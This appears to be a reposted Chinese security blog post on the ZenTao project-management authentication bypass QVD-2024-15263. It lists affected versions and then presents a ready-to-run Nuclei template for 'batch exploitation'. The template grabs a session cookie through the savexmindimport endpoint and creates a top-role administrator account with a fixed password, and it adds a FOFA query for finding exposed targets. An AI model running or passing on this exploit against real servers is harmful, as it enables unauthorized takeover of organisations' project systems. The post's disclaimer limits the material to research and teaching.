禅道身份认证绕过漏洞
禅道由禅道软件(青岛)有限公司开发,国产开源项目管理软件。它集项目管理、产品管理、项目管理、质量管理、DevOps、知识库、BI效能、工作流、学堂、反馈管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整覆盖了研发项目管理的核心流程。禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的API可以调用。禅道,专注研发项目管理!
影响范围
16.x <= 禅道项目管理系统< 18.12(开源版)
6.x <= 禅道项目管理系统< 8.12(企业版)
3.x <= 禅道项目管理系统< 4.12(旗舰版)
漏洞复现
3. 再次发包,确认新用户创建完成
批量利用
id: zentao_zentaosid_unauthorizedinfo:name: zentao_zentaosid_unauthorizedauthor: Xc1Ymseverity: mediumdescription: zentao_zentaosid_unauthorizedmetadata:max-request: 1verified: truefofa-query: title="Login - ZenTao", app="易软天创-禅道系统"tags: unauthorized,zentao,hwvariables:account: '{{rand_base(6)}}'password: 'Admin123@'http:- raw:- |GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1Host: {{Hostname}}- |POST /zentao/api.php/v1/users HTTP/1.1Cookie: {{cookie1}}Host: {{Hostname}}{"account": "{{account}}", "password": "{{password}}", "realname": "{{account}}", "role": "top", "group": "1"}- |POST /zentao/api.php/v1/users HTTP/1.1Cookie: {{cookie1}}Host: {{Hostname}}{"account": "{{account}}", "password": "{{password}}", "realname": "{{account}}", "role": "top", "group": "1"}extractors:- type: kvalname: cookie1part: header_1internal: truekval:- Set_Cookie- type: jsonpart: body_2json:- .accountmatchers:- type: wordpart: bodywords:- "\u300e\u7528\u6237\u540d\u300f\u5df2\u7ecf\u6709\u300e"# digest: 4a0a00473045022100aa690090f5134196337280620f55dabb356f8e63df6e622aab940f5fb0bcb0a10220303ed3a2ffc58eb6b6da31577912e55daf41763b1e96400ed00e61de69b46c63:6b2dd5af372f02ed15a56faf8ad98cf9
ref: https://mp.weixin.qq.com/s/F6EorG4kuNLeD1-BSg_plQ
原文始发于微信公众号(Hack All Sec):禅道身份认证绕过漏洞QVD-2024-15263
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论